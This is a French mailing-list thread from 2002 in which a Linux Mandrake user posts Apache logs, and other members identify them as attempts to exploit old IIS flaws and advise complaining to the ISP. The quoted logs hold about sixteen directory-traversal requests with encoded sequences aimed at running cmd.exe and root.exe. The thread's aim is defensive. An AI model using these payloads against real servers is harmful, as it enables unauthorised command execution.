pouvez vous me dire quel est le fichier de log de apache ou l'on trouve cela ? Merci ! Alain
Le Lundi 14 Janvier 2002 09:49, vous avez ?rit : > > J'ai eu le meme pb avec exactement les memes logs sur mon apache provenant > d'un rigolo de Wanadoo sur Paris. > > Je pense qu'une bonne plainte serait une bonne chose. > Wanadoo a un mail a disposition pour transmettre les pb de ce genre (voir > la hot line de Wanadoo pour avoir le mail en question). > > Christian RAGUET. > > > -----Message d'origine----- > De: Denis Bergeron [mailto:[EMAIL PROTECTED]] > Date: lundi 14 janvier 2002 02:18 > À: [EMAIL PROTECTED] > Objet: Re: [Confirme] Attaque d'Apache ? > > > C'est une attaque, il essaye d'exécuter le programme "root.exe" "cmd" .. > qui > > justement donne l'équivalent du accès telnet root sur IIS, mais c'est des > vieux trous de sécurité de IIS, c'est sans doute un script kiddy qui a pris > des trucs de l'an passée et qui sait pas faire la différence avec apache et > IIS... au pire, tu peux (en fait tu devrais) faire un recherche du > propriétaire de l'adresse et faire une plainte officielle à son ISP > (FAI)... Au Canada, la plupart des founisseurs d'accès à Internet coupe le > compte de ce genre de personne après trois plainte.s > > -Denis > > Le Dimanche 13 Janvier 2002 16:57, vous avez écrit : > > Bonsoir, > > > > Les logs d'Apache ci-dessous montrent que des tentatives de recherches > > de fichiers Windows se font sur mon Linux Mandrake 8.1. Les IP sont > > celles de France-Télécom. > > Ce serveur n'était pas censé fournir des pages sur Internet mais > > seulement en intranet. Il était ouvert sur l'extérieur à des fins de > > tests. Depuis, je l'ai verrouillé et en ai profité pour installer > > Bastille. > > > > Pour mon information personnelle, s'agit-il d'une tentative d'attaque ou > > d'une requête normale de FT (je doute) ? > > > > Merci pour vos lumières. > > > > AF > > > > 193.253.226.194 - - [11/Jan/2002:21:20:14 +0100] "GET > > /scripts/root.exe?/c+dir HTTP/1.0" 404 300 "-" "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:20:22 +0100] "GET > > /MSADC/root.exe?/c+dir HTTP/1.0" 404 298 "-" "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:20:26 +0100] "GET > > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:20:29 +0100] "GET > > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 308 "-" "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:20:33 +0100] "GET > > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" > > "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:20:38 +0100] "GET > > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > > HTTP/ > > > 1.0" 404 339 "-" "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:20:47 +0100] "GET > > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > > HTTP/ > > > 1.0" 404 339 "-" "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:20:58 +0100] "GET > > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/s > > > ystem32/cmd.exe?/c+dir HTTP/1.0" 404 355 "-" "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:21:03 +0100] "GET > > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" > > "-" > > > 193.253.226.194 - - [11/Jan/2002:21:21:06 +0100] "GET > > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" > > "-" > > > 193.253.226.194 - - [11/Jan/2002:21:21:10 +0100] "GET > > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" > > "-" > > > 193.253.226.194 - - [11/Jan/2002:21:21:15 +0100] "GET > > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" > > "-" > > > 193.253.226.194 - - [11/Jan/2002:21:21:19 +0100] "GET > > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 305 "-" > > "- > > > " > > > > 193.253.226.194 - - [11/Jan/2002:21:21:30 +0100] "GET > > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 305 "-" > > "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:21:36 +0100] "GET > > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 > > "-" > > > > "-" > > > > 193.253.226.194 - - [11/Jan/2002:21:21:40 +0100] "GET > > /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 322 "-" > > "-" ---------------------------------------- Content-Type: text/plain; charset="iso-8859-1"; name="message.footer" Content-Transfer-Encoding: 8bit Content-Description: ---------------------------------------- -- -- Alain
Vous souhaitez acquerir votre Pack ou des Services MandrakeSoft? Rendez-vous sur "http://www.mandrakestore.com";
